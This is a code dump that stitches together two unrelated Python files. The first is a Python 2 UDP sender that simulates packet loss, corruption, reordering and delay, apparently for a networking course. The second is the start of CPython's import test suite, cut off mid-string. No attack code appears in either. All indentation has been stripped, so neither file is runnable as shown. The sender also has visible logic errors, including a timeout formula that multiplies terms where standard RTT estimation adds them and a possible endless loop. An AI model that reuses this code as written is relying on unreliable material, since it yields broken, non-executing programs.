self.size = size_store
n = 0
self.i = 0
self.entire_data = { i : {'SEQ':0,'len':0,'CHECKSUM':'','DATA':'','SYN':0,'DATA_SIZE':len(self.data)+2} for i in range(0,len(self.data)+2)}
count = 0
self.entire_data1 = { i : {'SEQ':0,'len':0,'CHECKSUM':'','DATA':'', 'SYN':0,'DATA_SIZE':len(self.data)+2} for i in range(0,len(self.data)+2)}
for i in range(0,2):
self.entire_data[i]['SEQ'] = count
self.entire_data1[i]['SEQ'] = count
self.entire_data[i]['SYN'] = 1
self.entire_data1[i]['SYN'] = 1
self.entire_data[count]['len'] = i
self.entire_data1[count]['len'] = i
count+=1
for l in self.data:
self.entire_data[count]['SEQ'] = count
m = hashlib.md5(l)
self.entire_data[count]['len'] = size_store[count-2]
self.entire_data1[count]['len'] = size_store[count-2]
self.entire_data[count]['CHECKSUM'] = m.hexdigest()
self.entire_data[count]['DATA'] = l
self.entire_data1[count]['SEQ'] = count
m = hashlib.md5(l)
self.entire_data1[count]['CHECKSUM'] = m.hexdigest()
self.entire_data1[count]['DATA'] = l
count += 1
self.count1 = 0
i = 0
self.ack_count = 0
self.ack_window = {i : '' for i in range(0,len(self.data)+2)}
self.window = self.window_size
self.t0 = timeit.default_timer()
self.log = open("sender_log.txt","w+")
self.round_trip = {i : {'sent_time': 0, 'recive_time': 0} for i in range(0,len(self.data)+3)}
self.delayed_packet = {'SEQ':0,'len':0,'CHECKSUM':'','DATA':'', 'SYN':0,'DATA_SIZE':len(self.data)+2}
self.packet_delayed = 0
self.delayed_packet_timer = 0
self.maxDelay = int(sys.argv[13])
self.temp_timer = 0
self.pdup = float(sys.argv[8])
self.preorder = float(sys.argv[10])
self.is_reordered = 0
self.reorder_count = 0
self.maxOrder = int(sys.argv[11])
self.reorder_packet = {}
self.seed = int(sys.argv[14])
self.real_count = 0
self.segments_droped = 0
self.segments_corrupted = 0
self.segments_reordered = 0
self.segments_duplicated = 0
self.segments_delayed = 0
self.ToutRetransmission = 0
self.FTransmission = 0
self.DupAcks = 0
self.Segments = 0
self.pld_segments = 0
self.gamma = int(sys.argv[6])
self.EstimatedRTT = 0.5
self.DevRTT = 0.25
random.seed(self.seed)
self.TimeoutInterval = self.EstimatedRTT + 4 * self.DevRTT
self.recently_sent = 0
self.rev = 0
def corupt_data(self,cd):
rn = random.random()
if cd > rn:
return True
return False
def drop_packet(self,dp):
rn = random.random()
if dp > rn:
return True
return False
def delay_packet(self,pdl):
rn = random.random()
if pdl > rn:
return True
return False
def duplicate_packet(self, pdup):
rn = random.random()
if pdup > rn:
return True
return False
def packet_reorder(self, preorder):
rn = random.random()
if preorder > rn:
return True
return False
def delay_time(self):
rn = random.randint(0,self.maxDelay)
return rn/1000
def calculate_TimeoutIntervel(self, SampleRTT):
self.EstimatedRTT = 0.875 * self.EstimatedRTT + 0.125 * SampleRTT
self.DevRTT = 0.75 * self.DevRTT + 0.25 * abs(SampleRTT - self.EstimatedRTT)
TimeoutInterval = self.EstimatedRTT * self.gamma * self.DevRTT
if TimeoutInterval < 0.5:
self.TimeoutInterval = 0.5
return
if TimeoutInterval > 1.0:
self.TimeoutInterval = 1.0
return
self.TimeoutInterval = TimeoutInterval
def send_data(self, clientSocket, packet_no):
self.Segments += 1
if self.drop_packet(self.dp) and packet_no > 1:
self.pld_segments += 1
self.segments_droped += 1
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("RXT/drop","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
return
if self.duplicate_packet(self.pdup) and packet_no > 1:
self.pld_segments += 1
self.segments_duplicated += 1
t1 = timeit.default_timer()
if self.count1 > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/RXT/dup","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
sending_data = pickle.dumps(self.entire_data1[packet_no])
clientSocket.send(sending_data)
if self.corupt_data(self.cd) and packet_no > 1:
self.pld_segments += 1
self.segments_corrupted += 1
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/RXT/corr","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
packet = self.entire_data[packet_no]
p = list(packet['DATA'])
p[0] = str(int(xor(bool(p[0]), bool(1))))
packet['DATA'] = ''.join(p)
sending_data = pickle.dumps(packet)
t1 = timeit.default_timer()
clientSocket.send(sending_data)
else:
if self.packet_reorder(self.preorder) and self.count1 > 1 and self.is_reordered == 0:
self.pld_segments += 1
self.segments_reordered += 1
self.is_reordered = 1
self.reorder_packet = self.entire_data[packet_no]
return
if self.delay_packet(self.pdl) and self.count1 > 1:
self.pld_segments += 1
self.segments_delayed += 1
delayed_packet = self.entire_data1[packet_no]
t = threading.Timer(self.delay_time(), self.send_delayed_packet, [clientSocket, delayed_packet])
t.start()
return
sending_data = pickle.dumps(self.entire_data1[packet_no])
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/RXT","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
clientSocket.send(sending_data)
self.pld_segments += 1
packet = {}
return
def send_data_timeout(self, clientSocket, packet_no):
self.Segments += 1
if self.drop_packet(self.dp) and packet_no > 1:
self.pld_segments += 1
self.segments_droped += 1
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("drop","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
return
if self.duplicate_packet(self.pdup) and packet_no > 1:
self.pld_segments += 1
self.segments_duplicated += 1
t1 = timeit.default_timer()
if self.count1 > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/dup","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
sending_data = pickle.dumps(self.entire_data1[packet_no])
clientSocket.send(sending_data)
if self.corupt_data(self.cd) and packet_no > 1:
self.pld_segments += 1
self.segments_corrupted += 1
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/corr","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
packet = self.entire_data[packet_no]
p = list(packet['DATA'])
p[0] = str(int(xor(bool(p[0]), bool(1))))
packet['DATA'] = ''.join(p)
sending_data = pickle.dumps(packet)
t1 = timeit.default_timer()
clientSocket.send(sending_data)
else:
if self.packet_reorder(self.preorder) and self.count1 > 1 and self.is_reordered == 0:
self.pld_segments += 1
self.segments_reordered += 1
self.is_reordered = 1
self.reorder_packet = self.entire_data[packet_no]
return
if self.delay_packet(self.pdl) and self.count1 > 1:
self.pld_segments += 1
self.segments_delayed += 1
delayed_packet = self.entire_data1[packet_no]
t = threading.Timer(self.delay_time(), self.send_delayed_packet, [clientSocket, delayed_packet])
t.start()
return
sending_data = pickle.dumps(self.entire_data1[packet_no])
t1 = timeit.default_timer()
self.pld_segments += 1
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[packet_no]['len']+1),str(len(self.entire_data1[packet_no]['DATA'])),str(1)))
clientSocket.send(sending_data)
packet = {}
return
def send(self, clientSocket):
print 'Sending'
while self.ack_window[len(self.ack_window)-1] == '':
self.temp_timer = timeit.default_timer()
if self.count1 <= self.window and self.real_count <= self.window and self.count1 < len(self.data)+2 and self.real_count < len(self.data)+2:
self.recently_sent = self.count1
self.Segments += 1
if self.is_reordered == 1 and self.reorder_count == self.maxOrder:
t1 = timeit.default_timer()
if self.count1 > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/rord","{0:.3f}".format(t1-self.t0),"D",str(self.reorder_packet['len']+1),str(len(self.reorder_packet['DATA'])),str(1)))
sending_data = pickle.dumps(self.reorder_packet)
clientSocket.send(sending_data)
self.is_reordered = 0
self.reorder_count = 0
continue
if self.is_reordered == 1 and self.reorder_count < self.maxOrder:
self.reorder_count += 1
if self.drop_packet(self.dp) and self.count1 > 1:
self.pld_segments += 1
t1 = timeit.default_timer()
self.round_trip[self.count1]['sent_time'] = t1-self.t0
self.segments_droped += 1
t1 = timeit.default_timer()
if self.count1 > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("drop","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
self.count1 += 1
self.real_count += 1
continue
if self.duplicate_packet(self.pdup) and self.count1 > 1:
self.pld_segments += 1
self.segments_duplicated += 1
t1 = timeit.default_timer()
if self.count1 > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/dup","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
sending_data = pickle.dumps(self.entire_data[self.count1])
clientSocket.send(sending_data)
self.real_count += 1
if self.corupt_data(self.cd) and self.count1 > 1:
self.pld_segments += 1
t1 = timeit.default_timer()
self.round_trip[self.count1]['sent_time'] = t1-self.t0
self.segments_corrupted += 1
t1 = timeit.default_timer()
if self.count1 > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/corr","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
packet = self.entire_data[self.count1]
p = list(packet['DATA'])
p[0] = str(int(xor(bool(p[0]), bool(1))))
packet['DATA'] = ''.join(p)
sending_data = pickle.dumps(packet)
t1 = timeit.default_timer()
else:
if self.packet_reorder(self.preorder) and self.count1 > 1 and self.is_reordered == 0:
self.pld_segments += 1
t1 = timeit.default_timer()
self.round_trip[self.count1]['sent_time'] = t1-self.t0
self.segments_reordered += 1
self.is_reordered = 1
self.reorder_packet = self.entire_data[self.count1]
self.count1 += 1
self.real_count += 1
continue
if self.delay_packet(self.pdl) and self.count1 > 1:
self.pld_segments += 1
self.segments_delayed += 1
t1 = timeit.default_timer()
delayed_packet = self.entire_data[self.count1]
self.round_trip[delayed_packet['SEQ']]['sent_time'] = t1-self.t0
t = threading.Timer(self.delay_time(), self.send_delayed_packet, [clientSocket, delayed_packet])
t.start()
self.count1 += 1
self.real_count += 1
continue
t1 = timeit.default_timer()
if self.count1 == 0:
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"S",str(0),str(0),str(0)))
if self.count1 == 1:
t1 = timeit.default_timer()
while self.rev == 0:
sanal = 0
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"SA",str(0),str(0),str(1)))
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"A",str(1),str(0),str(1)))
if self.count1 > 1:
self.pld_segments += 1
self.round_trip[self.count1]['sent_time'] = t1-self.t0
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[self.count1]['len']+1),str(len(self.entire_data[self.count1]['DATA'])),str(1)))
sending_data = pickle.dumps(self.entire_data[self.count1])
clientSocket.send(sending_data)
self.count1 += 1
self.real_count += 1
def recive(self,clientSocket):
ack_recived = 0
while 1:
clientSocket.settimeout(self.TimeoutInterval)
try:
ack_recived = int(clientSocket.recv(1024))
print 'ACK = ',self.entire_data1[ack_recived]['len']
self.rev = 1
if self.ack_window[ack_recived] == '' and self.round_trip[ack_recived]['sent_time']:
t1 = timeit.default_timer()
self.round_trip[ack_recived]['recive_time'] = t1-self.t0
sampleRTT = self.round_trip[ack_recived]['recive_time'] - self.round_trip[ack_recived]['sent_time']
self.calculate_TimeoutIntervel(sampleRTT)
if self.ack_window[ack_recived] == 'a':
self.DupAcks += 1
t1 = timeit.default_timer()
if ack_recived > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
else:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(1)))
self.ack_window[ack_recived] = 'accessed'
continue
if self.ack_window[ack_recived] == 'accessed':
self.DupAcks += 1
t1 = timeit.default_timer()
if ack_recived > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
else:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(1)))
self.ack_window[ack_recived] = 'retransmit'
continue
if self.ack_window[ack_recived] == 'retransmit':
self.DupAcks += 1
self.FTransmission += 1
t1 = timeit.default_timer()
if ack_recived > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
else:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv/DA","{0:.3f}".format(t1-self.t0),"A","1", "0",str(1)))
self.ack_window[ack_recived] = 'a'
self.send_data(clientSocket, int(ack_recived)+1)
continue
if self.ack_window[ack_recived] == '':
t1 = timeit.default_timer()
for keys in self.ack_window:
if keys <= ack_recived and self.ack_window[ack_recived] == '' and self.ack_window[keys] == '':
if self.count1 < len(self.data) + 2:
self.window += 1
self.ack_window[keys] = 'accesssed'
if keys > ack_recived:
break
self.ack_window[ack_recived] = 'accessed'
if ack_recived > 1:
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"A","1", "0",str(self.entire_data1[ack_recived]['len']+1)))
if int(ack_recived) >= len(self.data)+1:
clientSocket.settimeout(10)
packet = {'SEQ':0,'CHECKSUM':'','DATA':'','SYN':0,'DATA_SIZE':0}
packet['SEQ']= self.entire_data[len(self.entire_data)-1]['SEQ']+1
packet['DATA'] = "DONE"
packet['SYN'] = 3
sending_data = pickle.dumps(packet)
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"F",str(self.entire_data[len(self.entire_data)-1]['len']+1),str(0),str(1)))
clientSocket.send(sending_data)
rec = clientSocket.recv(1024)
rec = ''
while rec != '':
rec = clientSocket.recv(1024)
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"A",str(1),str(0),str(self.entire_data[len(self.entire_data)-1]['len']+2)))
while rec == '':
rec = clientSocket.recv(1024)
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("rcv","{0:.3f}".format(t1-self.t0),"F",str(1),str(0),str(self.entire_data[len(self.entire_data)-1]['len']+2)))
clientSocket.send('A')
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd","{0:.3f}".format(t1-self.t0),"A",str(self.entire_data[len(self.entire_data)-1]['len']+2),str(0),str(2)))
clientSocket.close()
self.log.write("=============================================================\n")
self.log.write("Size of the file (in Bytes) "+str(self.size[-1])+"\n")
self.log.write("Segments transmitted (including drop & RXT) "+str(self.Segments+2)+"\n")
self.log.write("Number of Segments handled by PLD "+str(self.pld_segments)+"\n")
self.log.write("Number of Segments dropped "+str(self.segments_droped)+"\n")
self.log.write("Number of Segments Corrupted "+str(self.segments_corrupted)+"\n")
self.log.write("Number of Segments Re-ordered "+str(self.segments_reordered)+"\n")
self.log.write("Number of Segments Duplicated "+str(self.segments_duplicated)+"\n")
self.log.write("Number of Segments Delayed "+str(self.segments_delayed)+"\n")
self.log.write("Number of Retransmissions due to TIMEOUT "+str(self.ToutRetransmission)+"\n")
self.log.write("Number of FAST RETRANSMISSION "+str(self.FTransmission)+"\n")
self.log.write("Number of DUP ACKS received "+str(self.DupAcks)+"\n")
self.log.write("=============================================================")
self.log.close()
break
except timeout:
self.ToutRetransmission += 1
self.send_data_timeout(clientSocket, ack_recived + 1)
if self.count1 > len(self.data)+1 and int(ack_recived) >= len(self.data)+1:
break
def send_delayed_packet(self, clientSocket, delayed_packet):
try:
t1 = timeit.default_timer()
self.log.write("{0:20}{1:10}{2:10}{3:10}{4:10}{5:10}\n".format("snd/dely","{0:.3f}".format(t1-self.t0),"D",str(self.entire_data[delayed_packet['SEQ']]['len']+1),str(self.mass),str(1)))
sending_data = pickle.dumps(delayed_packet)
clientSocket.send(sending_data)
except:
send_data = 0
clientSocket = socket(AF_INET, SOCK_DGRAM)
reciver_IP = str(sys.argv[1])
reciver_port = int(sys.argv[2])
clientSocket.connect((reciver_IP, reciver_port))
instance_of_sender = Sender()
thread1 = Thread(target = instance_of_sender.send, args = (clientSocket,))
thread2 = Thread(target = instance_of_sender.recive, args = (clientSocket,))
thread1.start()
thread2.start()
while thread2.isAlive():
continue
|
__init__.py | # We import importlib *ASAP* in order to test #15386
import importlib
import importlib.util
from importlib._bootstrap_external import _get_sourcefile
import builtins
import marshal
import os
import platform
import py_compile
import random
import stat
import sys
import time
import unittest
import unittest.mock as mock
import textwrap
import errno
import shutil
import contextlib
import test.support
from test.support import (
EnvironmentVarGuard, TESTFN, check_warnings, forget, is_jython,
make_legacy_pyc, rmtree, run_unittest, swap_attr, swap_item, temp_umask,
unlink, unload, create_empty_file, cpython_only, TESTFN_UNENCODABLE,
temp_dir, DirsOnSysPath)
from test.support import script_helper
from test.test_importlib.util import uncache
try:
import threading
except ImportError as e:
threading = None
skip_if_dont_write_bytecode = unittest.skipIf(
sys.dont_write_bytecode,
"test meaningful only when writing bytecode")
def remove_files(name):
for f in (name + ".py",
name + ".pyc",
name + ".pyw",
name + "$py.class"):
unlink(f)
rmtree('__pycache__')
@contextlib.contextmanager
def _ready_to_import(name=None, source=""):
# sets up a temporary directory and removes it
# creates the module file
# temporarily clears the module from sys.modules (if any)
# reverts or removes the module when cleaning up
name = name or "spam"
with temp_dir() as tempdir:
path = script_helper.make_script(tempdir, name, source)
old_module = sys.modules.pop(name, None)
try:
sys.path.insert(0, tempdir)
yield name, path
sys.path.remove(tempdir)
finally:
if old_module is not None:
sys.modules[name] = old_module
elif name in sys.modules:
del sys.modules[name]
class ImportTests(unittest.TestCase):
def setUp(self):
remove_files(TESTFN)
importlib.invalidate_caches()
def tearDown(self):
unload(TESTFN)
def test_import_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
import something_that_should_not_exist_anywhere
def test_from_import_missing_module_raises_ModuleNotFoundError(self):
with self.assertRaises(ModuleNotFoundError):
from something_that_should_not_exist_anywhere import blah
def test_from_import_missing_attr_raises_ImportError(self):
with self.assertRaises(ImportError):
from importlib import something_that_should_not_exist_anywhere
def test_case_sensitivity(self):
# Brief digression to test that import is case-sensitive: if we got
# this far, we know for sure that "random" exists.
with self.assertRaises(ImportError):
import RAnDoM
def test_double_const(self):
# Another brief digression to test the accuracy of manifest float
# constants.
from test import double_const # don't blink -- that *was* the test
def test_import(self):
def test_with_extension(ext):
# The extension is normally ".py", perhaps ".pyw".
source = TESTFN + ext
if is_jython:
pyc = TESTFN + "$py.class"
else:
pyc = TESTFN + ".pyc"
with open(source, "w") as f:
print("# This tests Python's ability to import a",
ext, "file.", file=f)
a = random.randrange(1000)
b = random.randrange(1000)
print("a =", a, file=f)
print("b =", b, file=f)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
importlib.invalidate_caches()
try:
try:
mod = __import__(TESTFN)
except ImportError as err:
self.fail("import from %s failed: %s" % (ext, err))
self.assertEqual(mod.a, a,
"module loaded (%s) but contents invalid" % mod)
self.assertEqual(mod.b, b,
"module loaded (%s) but contents invalid" % mod)
finally:
forget(TESTFN)
unlink(source)
unlink(pyc)
sys.path.insert(0, os.curdir)
try:
test_with_extension(".py")
if sys.platform.startswith("win"):
for ext in [".PY", ".Py", ".pY", ".pyw", ".PYW", ".pYw"]:
test_with_extension(ext)
finally:
del sys.path[0]
def test_module_with_large_stack(self, module='longlist'):
# Regression test for http://bugs.python.org/issue561858.
filename = module + '.py'
# Create a file with a list of 65000 elements.
with open(filename, 'w') as f:
f.write('d = [\n')
for i in range(65000):
f.write('"",\n')
f.write(']')
try:
# Compile & remove .py file; we only need .pyc.
# Bytecode must be relocated from the PEP 3147 bytecode-only location.
py_compile.compile(filename)
finally:
unlink(filename)
# Need to be able to load from current dir.
sys.path.append('')
importlib.invalidate_caches()
namespace = {}
try:
make_legacy_pyc(filename)
# This used to crash.
exec('import ' + module, None, namespace)
finally:
# Cleanup.
del sys.path[-1]
unlink(filename + 'c')
unlink(filename + 'o')
# Remove references to the module (unload the module)
namespace.clear()
try:
del sys.modules[module]
except KeyError:
pass
def test_failing_import_sticks(self):
source = TESTFN + ".py"
with open(source, "w") as f:
print("a = 1/0", file=f)
# New in 2.4, we shouldn't be able to import that no matter how often
# we try.
sys.path.insert(0, os.curdir)
importlib.invalidate_caches()
if TESTFN in sys.modules:
del sys.modules[TESTFN]
try:
for i in [1, 2, 3]:
self.assertRaises(ZeroDivisionError, __import__, TESTFN)
self.assertNotIn(TESTFN, sys.modules,
"damaged module in sys.modules on %i try" % i)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_import_name_binding(self):
# import x.y.z binds x in the current namespace
import test as x
import test.support
self.assertIs(x, test, x.__name__)
self.assertTrue(hasattr(test.support, "__file__"))
# import x.y.z as w binds z as w
import test.support as y
self.assertIs(y, test.support, y.__name__)
def test_failing_reload(self):
# A failing reload should leave the module object in sys.modules.
source = TESTFN + os.extsep + "py"
with open(source, "w") as f:
f.write("a = 1\nb=2\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertIn(TESTFN, sys.modules)
self.assertEqual(mod.a, 1, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
# On WinXP, just replacing the .py file wasn't enough to
# convince reload() to reparse it. Maybe the timestamp didn't
# move enough. We force it to get reparsed by removing the
# compiled file too.
remove_files(TESTFN)
# Now damage the module.
with open(source, "w") as f:
f.write("a = 10\nb=20//0\n")
self.assertRaises(ZeroDivisionError, importlib.reload, mod)
# But we still expect the module to be in sys.modules.
mod = sys.modules.get(TESTFN)
self.assertIsNotNone(mod, "expected module to be in sys.modules")
# We should have replaced a w/ 10, but the old b value should
# stick.
self.assertEqual(mod.a, 10, "module has wrong attribute values")
self.assertEqual(mod.b, 2, "module has wrong attribute values")
finally:
del sys.path[0]
remove_files(TESTFN)
unload(TESTFN)
@skip_if_dont_write_bytecode
def test_file_to_source(self):
# check if __file__ points to the source file where available
source = TESTFN + ".py"
with open(source, "w") as f:
f.write("test = None\n")
sys.path.insert(0, os.curdir)
try:
mod = __import__(TESTFN)
self.assertTrue(mod.__file__.endswith('.py'))
os.remove(source)
del sys.modules[TESTFN]
make_legacy_pyc(source)
importlib.invalidate_caches()
mod = __import__(TESTFN)
base, ext = os.path.splitext(mod.__file__)
self.assertEqual(ext, '.pyc')
finally:
del sys.path[0]
remove_files(TESTFN)
if TESTFN in sys.modules:
del sys.modules[TESTFN]
def test_import_by_filename(self):
path = os.path.abspath(TESTFN)
encoding = sys.getfilesystemencoding()
try:
path.encode(encoding)
except UnicodeEncodeError:
self.skipTest('path is not encodable to {}'.format(encoding))
with self.assertRaises(ImportError) as c:
__import__(path)
def test_import_in_del_does_not_crash(self):
# Issue 4236
testfn = script_helper.make_script('', TESTFN, textwrap.dedent("""\
import sys
class C:
def __del__(self):
import importlib
sys.argv.insert(0, C())
"""))
script_helper.assert_python_ok(testfn)
@skip_if_dont_write_bytecode
def test_timestamp_overflow(self):
# A modification timestamp larger than 2**32 should not be a problem
# when importing a module (issue #11235).
sys.path.insert(0, os.curdir)
try:
source = TESTFN + ".py"
compiled = importlib.util.cache_from_source(source)
with open(source, 'w') as f:
pass
try:
os.utime(source, (2 ** 33 - 5, 2 ** 33 - 5))
except OverflowError:
self.skipTest("cannot set modification time to large integer")
except OSError as e:
if e.errno not in (getattr(errno, 'EOVERFLOW', None),
getattr(errno, 'EINVAL', None)):
raise
self.skipTest("cannot set modification time to large integer ({})".format(e))
__import__(TESTFN)
# The pyc file was created.
os.stat(compiled)
finally:
del sys.path[0]
remove_files(TESTFN)
def test_bogus_fromlist(self):
try:
__import__('http', fromlist=['blah'])
except ImportError:
self.fail("fromlist must allow bogus names")
@cpython_only
def test_delete_builtins_import(self):
args = ["-c", "del __builtins__.__import__; import os"]
popen = script_helper.spawn_python(*args)
stdout, stderr = popen.communicate()
self.assertIn(b"ImportError", stdout)
def test_from_import_message_for_nonexistent_module(self):
with self.assertRaisesRegex(ImportError, "^No module named 'bogus'"):
from bogus import foo
def test_from_import_message_for_existing_module(self):
with self.assertRaisesRegex(ImportError, "^cannot import name 'bogus'"):
from re import bogus
def test_from_import_AttributeError(self):
# Issue #24492: trying to import an attribute that raises an
# AttributeError should lead to an ImportError.
class AlwaysAttributeError:
def __getattr__(self, _):
raise AttributeError
module_name = 'test_from_import_AttributeError'
self.addCleanup(unload, module_name)
sys.modules[module_name] = AlwaysAttributeError()
with self.assertRaises(ImportError):
from test_from_import_AttributeError import does_not_exist
@cpython_only
def test_issue31492(self):
# There shouldn't be an assertion failure in case of failing to import
# from a module with a bad __name__ attribute, or in case of failing
# to access an attribute of such a module.
with swap_attr(os, '__name__', None):
with self.assertRaises(ImportError):
from os import does_not_exist
with self.assertRaises(AttributeError):
os.does_not_exist
@unittest.skipUnless(threading != None, "concurrency requires threading")
def test_concurrency(self):
sys.path.insert(0, os.path.join(os.path.dirname(__file__), 'data'))
try:
exc = None
def run():
event.wait()
try:
import package
except BaseException as e:
nonlocal exc
exc = e
for i in range(10):
event = threading.Event()
threads = [threading.Thread(target=run) for x in range(2)]
try:
with test.support.start_threads(threads, event.set):
time.sleep(0)
finally:
sys.modules.pop('package', None)
sys.modules.pop('package.submodule', None)
if exc is not None:
raise exc
finally:
del sys.path[0]
@skip_if_dont_write_bytecode
class FilePermissionTests(unittest.TestCase):
# tests for file mode on cached .pyc files
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_creation_mode(self):
mask = 0o022
with temp_umask(mask), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
module = __import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
# Check that the umask is respected, and the executable bits
# aren't set.
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)),
oct(0o666 & ~mask))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_mode_issue_2051(self):
# permissions of .pyc should match those of .py, regardless of mask
mode = 0o600
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(mode))
@unittest.skipUnless(os.name == 'posix',
"test meaningful only on posix systems")
def test_cached_readonly(self):
mode = 0o400
with temp_umask(0o022), _ready_to_import() as (name, path):
cached_path = importlib.util.cache_from_source(path)
os.chmod(path, mode)
__import__(name)
if not os.path.exists(cached_path):
self.fail("__import__ did not result in creation of "
"a .pyc file")
stat_info = os.stat(cached_path)
expected = mode | 0o200 # Account for fix for issue #6074
self.assertEqual(oct(stat.S_IMODE(stat_info.st_mode)), oct(expected))
def test_pyc_always_writable(self):
# Initially read-only .pyc files on Windows used to cause problems
# with later updates, see issue #6074 for details
with _ready_to_import() as (name, path):
# Write a Python file, make it read-only and import it
with open(path, 'w') as f:
f.write("x = 'original'\n")
# Tweak the mtime of the source to ensure pyc gets updated later
s = os.stat(path)
os.utime(path, (s.st_atime, s.st_mtime-100000000))
os.chmod(path, 0o400)
m = __import__(name)
self.assertEqual(m.x, 'original')
# Change the file and then reimport it
os.chmod(path, 0o600)
with open(path, 'w') as f:
f.write("x = 'rewritten'\n")
unload(name)
importlib.invalidate_caches()
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
# Now delete the source file and check the pyc was rewritten
unlink(path)
unload(name)
importlib.invalidate_caches()
bytecode_only = path + "c"
os.rename(importlib.util.cache_from_source(path), bytecode_only)
m = __import__(name)
self.assertEqual(m.x, 'rewritten')
class PycRewritingTests(unittest.TestCase):
# Test that the `co_filename` attribute on code objects always points
# to the right file, even when various things happen (e.g. both the .py
# and the .pyc file are renamed).
module_name = "unlikely_module_name"
module_source = """
import sys
code_filename = sys._getframe().f_code.co_filename
module_filename = __file__
constant = 1
def func():
pass
